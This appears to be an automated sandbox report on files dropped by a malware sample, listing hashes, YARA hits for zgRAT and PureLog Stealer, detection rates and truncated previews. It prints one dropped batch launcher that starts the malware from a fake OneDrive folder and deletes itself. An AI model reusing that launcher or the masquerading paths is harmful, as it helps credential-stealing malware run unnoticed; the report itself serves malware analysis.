                                                          SHA-256:3C958599CD0EFD3DF41A3D59D9174D34E9821052ED54C3250EC9EBAD40713D6D
                                                          SHA-512:4593C9583844BDA090F3377F1876B54ACB5514AAF8E9D50276001B7574F090BEB5450C470F4233B280BF0F027D82CCE7B3DB46400F71FE5D8CCB3D799D1665CD
                                                          Malicious:false
                                                          Preview:j71lY8uy7tSFi8cd1vvenfyU1cbP2DctTFMSObG6xH2mpndt0RXLjMNDIhu5hf53RjwcwJPapyqgmMoN8sZkqQKG2IKqrKZSM9VG1B6qC7gugrb62g7yGUNBYpkn9iseZXTn0iW6vtituZkKrNyKNkM1wTrLbTqdOCUJXxFUJADWweR9FZ5vuiQyKb1h0LfbCEerEaw4IeAMgzFSCsFBY4tpvg866id8emUr9j4onAnPhDRVVieIFeCHUy6ic08jBCr4fYScybYXRdIrOnkXDU2AkNWKmVLwCDOeVXz7QCUoFoz1qPTzPkgqKrTSBIzcPlUOOnV1xmHBAN55XfeXCWhcgiUoDh5HM2ZeTlmC3cCmdfp6wY4fnbZ2E2rqTqxPr9zIyalv3bekU48B2Y2pnZducgZa46tMow5dphHVwJmM7ziK4px5xImRfFpSAK07sR5h8eVVQh3dxRwn7PgOIyYgKo8k1yUlSpep3BMZTcoQOIdNSCVvnmy32ZXTgudbNRLHxGt6DH4qKIRBKuSzdi7q1kxen22j8MD77WZMTYrgrHtuHVJvco8oTfQNTPSLPVs7FUEyUFgE1b9t1CWStGGUNZncFM2DGgRVZvpxQUbWI3x2fgWQ2AcIPYtpqmsHNc8UKoUFXjBYptLUlv6i0mKFEJFBB9GomTJp5cs1LQ3T8EcgMZE5pJRlR2PBiTDXcWwWjfZJCEXks0HAqjym5L8cBiYCMrT2Mf1mRG6qA42lwr2avPU8ebcRXTUBHX6VveXM9fsknImASXpUp7Q7WUXvDkO8v4in8hzRUqbQhuVWzb8Ao9VKG99aHlIZQuysk9CvhXA9fAZm8B6mlNTwjXg9hZKshB
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3861504
                                                          Entropy (8bit):7.835766949495404
                                                          Encrypted:false
                                                          SSDEEP:98304:SlFTtIkKJ8h91Zv7aphwzT8YRMR9UOu93dI:S7SF8/baTm8kMPUOu9
                                                          MD5:798B5560B2A2C6596A0C1A09419AD2C4
                                                          SHA1:6F18005EAACE373EE3EC23138C7D5AF9D1BCB51E
                                                          SHA-256:93DC0D7CACC55D4965A1D55A3D163125481EE2BE7CEF9640320F58D714BD8011
                                                          SHA-512:ED88BAD4B7E2103222EFC1864E36A6B6D9E83396361191C6D9ED0623BADB783629E87A2CC2097D4D79586D9514D02D15DF7B411C1A012BEB212009EFE2E24010
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................:...........;.. ... ;...@.. .......................`;...........@...................................;.K.... ;.p....................@;...................................................... ............... ..H............text.....:.. ....:................. ..`.rsrc...p.... ;.......:.............@....reloc.......@;.......:.............@..B..................;.....H...........@.......e...D....)0.'.;......................................0..........(.... ........8........E....)...M.......q...8$...(.... ....~....{....:....& ....8....(.... ....~....{~...:....& ....8....(.... ....~....{{...9....& ....8z...*...0..<....... ........8........E............................d...8)...~....9U... ....~....{....:....& ....8....~....(#... .... .... ....s....~....('....... ....8{......... ....~....{....9a...& ....8V...8z... ....~....{....9=...& ....82...
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):292
                                                          Entropy (8bit):5.813001917277672
                                                          Encrypted:false
                                                          SSDEEP:6:jF/LX6ZrGN5Z8mcSgc6OxjGfZviRTDPe4CdXDMaaLTmOcPBRCfJEy:jVX6oR8mjgcvxjGfZ6T6PXDMH6O+BRCR
                                                          MD5:3A7527F6604144C116CAABCD12DAE3EC
                                                          SHA1:33B634BC96EE9249A56C3A5D948C7F75FD885935
                                                          SHA-256:6E25F6C713F1389C90BBE7272B13D3729673968C827105AE7239C33B55E609D9
                                                          SHA-512:43170CF6ACF5601E08B5F499FF915A304979034E07C7E998D3840DC04658DC9C62F88E59B4D9B9E988EDF9B3B24B2C614710962E6C30E6B0B5B7606F0E71EB0C
                                                          Malicious:false
                                                          Preview:G5j4xEjXOrgIZ23CLvB8OtslQawMKD1IKj21DNaJJHvcZrg3R8elHWCXN8oWRXMLzX809B97U2yH8PLi335MiQBygenEjD1w4jmBtq3P8hQPh5Z7wFdXbAmjWJTeX4XRACMYnKzMApNB9wRlFqSdkeU46DpjXY1DJ8OftBUmPQXwwljk2sZrm3rgrRbjeQzmyJ1Bhv2EWpOTGiIVdEqo8KbPRsxbjuH9av7mtiCG0VV6pXZJJGGZjKnnsmty8aeliO3Ukfl5Bjynzfj3TnRdoraPIT4HyOIZ0tYb
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3861504
                                                          Entropy (8bit):7.835766949495404
                                                          Encrypted:false
                                                          SSDEEP:98304:SlFTtIkKJ8h91Zv7aphwzT8YRMR9UOu93dI:S7SF8/baTm8kMPUOu9
                                                          MD5:798B5560B2A2C6596A0C1A09419AD2C4
                                                          SHA1:6F18005EAACE373EE3EC23138C7D5AF9D1BCB51E
                                                          SHA-256:93DC0D7CACC55D4965A1D55A3D163125481EE2BE7CEF9640320F58D714BD8011
                                                          SHA-512:ED88BAD4B7E2103222EFC1864E36A6B6D9E83396361191C6D9ED0623BADB783629E87A2CC2097D4D79586D9514D02D15DF7B411C1A012BEB212009EFE2E24010
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................:...........;.. ... ;...@.. .......................`;...........@...................................;.K.... ;.p....................@;...................................................... ............... ..H............text.....:.. ....:................. ..`.rsrc...p.... ;.......:.............@....reloc.......@;.......:.............@..B..................;.....H...........@.......e...D....)0.'.;......................................0..........(.... ........8........E....)...M.......q...8$...(.... ....~....{....:....& ....8....(.... ....~....{~...:....& ....8....(.... ....~....{{...9....& ....8z...*...0..<....... ........8........E............................d...8)...~....9U... ....~....{....:....& ....8....~....(#... .... .... ....s....~....('....... ....8{......... ....~....{....9a...& ....8V...8z... ....~....{....9=...& ....82...
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):177
                                                          Entropy (8bit):5.651489963066555
                                                          Encrypted:false
                                                          SSDEEP:3:2v/rcEH/QgvnxEUXinWtt9Bu9KKK0RSgUC2tC6REj/WTzpPsNlLgtTNc9:yrcEHogvnOUuWL9BEKKK0bUjtC6KKF6d
                                                          MD5:3F22C335357BAD1124110D9CA073444A
                                                          SHA1:9958AD16003D22DF16EE26F17D4CE86EE778F218
                                                          SHA-256:09EF76A24C66A5B6683E225838E09031F421794A34799B7A42942CC00E55AEC2
                                                          SHA-512:FE1689C50AEBFB96A5E2AA8D6C284400073DF1C278D71AFC035E981F816AF647AB9EE55DF41F3541C65B48C1C8B67D34A54891F951B79B51E3BE25066782D8AF
                                                          Malicious:false
                                                          Preview:X9WAyNC0fVJB70ynMQldHxbZwFHIZOEn8dUa3IfrF8txPyvhn12SCBDkh6NsF4bQQfDdgXtEv4YIEoJ8UjehWwl6at264wlKhcgtuRBPHxgHm4g2xOYfZ34d4HDwewJ9TNllHZNCiPaiPdUgNAJpXFvniDznOOvVnhyZS4uYBW7KdVNaw
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3861504
                                                          Entropy (8bit):7.835766949495404
                                                          Encrypted:false
                                                          SSDEEP:98304:SlFTtIkKJ8h91Zv7aphwzT8YRMR9UOu93dI:S7SF8/baTm8kMPUOu9
                                                          MD5:798B5560B2A2C6596A0C1A09419AD2C4
                                                          SHA1:6F18005EAACE373EE3EC23138C7D5AF9D1BCB51E
                                                          SHA-256:93DC0D7CACC55D4965A1D55A3D163125481EE2BE7CEF9640320F58D714BD8011
                                                          SHA-512:ED88BAD4B7E2103222EFC1864E36A6B6D9E83396361191C6D9ED0623BADB783629E87A2CC2097D4D79586D9514D02D15DF7B411C1A012BEB212009EFE2E24010
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SIHClient.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SIHClient.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SIHClient.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SIHClient.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SIHClient.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SIHClient.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................:...........;.. ... ;...@.. .......................`;...........@...................................;.K.... ;.p....................@;...................................................... ............... ..H............text.....:.. ....:................. ..`.rsrc...p.... ;.......:.............@....reloc.......@;.......:.............@..B..................;.....H...........@.......e...D....)0.'.;......................................0..........(.... ........8........E....)...M.......q...8$...(.... ....~....{....:....& ....8....(.... ....~....{~...:....& ....8....(.... ....~....{{...9....& ....8z...*...0..<....... ........8........E............................d...8)...~....9U... ....~....{....:....& ....8....~....(#... .... .... ....s....~....('....... ....8{......... ....~....{....9a...& ....8V...8z... ....~....{....9=...& ....82...
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1915
                                                          Entropy (8bit):5.363869398054153
                                                          Encrypted:false
                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                          MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                          SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                          SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                          SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                          Process:C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):207
                                                          Entropy (8bit):5.339220446711054
                                                          Encrypted:false
                                                          SSDEEP:6:hCRLuVFOOr+DED+4ThG5TiZKOZG1wkn23fd1:CuVEOCDED+/mff
                                                          MD5:4FE48135BC8F73197A968E623787E1BB
                                                          SHA1:72161B06EE84DECE3024BFC251550C9A20C1DA41
                                                          SHA-256:AD4B4764DA58126AD7F6A1910202454A269A8946952AF04D2F59101FAC1C897D
                                                          SHA-512:E98D6746A1C9048FB910F76187BA1D117DB477A00520CE1CA83EB340AC611EE295B20022CFD7890B6E6194286F6FADD90B0F14F81ABADABEFF55641151F705E3
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qVPGMYvCwM.bat"
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.213660689688185
                                                          Encrypted:false
                                                          SSDEEP:3:+CoGmlXBn:vm7
                                                          MD5:B2D536C1433551564A7240B1213EEB37
                                                          SHA1:863767E59E42C4434AFA0321AE328C6A4497E749
                                                          SHA-256:CA62B40B0DF72A6F531C60CDBF80F7E43640F5DA056F262A8F7F8484089A0B44
                                                          SHA-512:8302D909AFF70F1BD6AD2AADD717292F54126F48EEEA871C5B566CA940DB0296C52F3EF7EF7B850F24C05D208C3EDAA41A9ADE8E4DA95E677DCEBDB01451F6F1
                                                          Malicious:false
                                                          Preview:WoGjXcGpgxDaCJMcCNIMScdAm
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.529329139831718
                                                          Encrypted:false
                                                          SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                          MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                          SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                          SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                          SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Joe Sandbox View:
                                                          • Filename: XNPOazHpXF.exe, Detection: malicious, Browse
                                                          • Filename: 3e88PGFfkf.exe, Detection: malicious, Browse
                                                          • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                          • Filename: CPNSQusnwC.exe, Detection: malicious, Browse
                                                          • Filename: t8xf0Y1ovi.exe, Detection: malicious, Browse
                                                          • Filename: teh76E2k50.exe, Detection: malicious, Browse
                                                          • Filename: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, Detection: malicious, Browse
                                                          • Filename: 84JufgBTrA.exe, Detection: malicious, Browse
                                                          • Filename: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Detection: malicious, Browse
                                                          • Filename: kIdT4m0aa4.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):294912
                                                          Entropy (8bit):6.010605469502259
                                                          Encrypted:false
                                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):5.645950918301459
                                                          Encrypted:false
                                                          SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                          MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                          SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                          SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                          SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41472
                                                          Entropy (8bit):5.6808219961645605
                                                          Encrypted:false
                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22016
                                                          Entropy (8bit):5.45778554132892
                                                          Encrypted:false
                                                          SSDEEP:384:O+EQ5SccsLOYWRl1U/JRZA6cBrhhptFFg96lB1Cev6xTu:5NlWNU/G6cbHblt/vl
                                                          MD5:F6BA6A3BAE64426F936CA859866F594B
                                                          SHA1:176047CACF3E8AF31DB121ADD21E122B192D8B62
                                                          SHA-256:4B18BEB315D1D3C80B85F77CAFBD45199C68C11F422D6657355687310929B13E
                                                          SHA-512:C7B3E09F57481CE131F3FDC3EFFBDACB38FBB3AC22BA88B5688182846F9AE413CA543666B85961364E823341B83CBDB97E0E48649677018C99B6CA2DA9BD0E4E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....v9g...........!.....N...........l... ........@.. ....................................@.................................|l..O.................................................................................... ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............XL..x...................................................................................................................................................................(h7.......5....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):40448
                                                          Entropy (8bit):5.7028690200758465
                                                          Encrypted:false
                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):64000
                                                          Entropy (8bit):5.857602289000348
                                                          Encrypted:false
                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):70144
                                                          Entropy (8bit):5.909536568846014
                                                          Encrypted:false
                                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
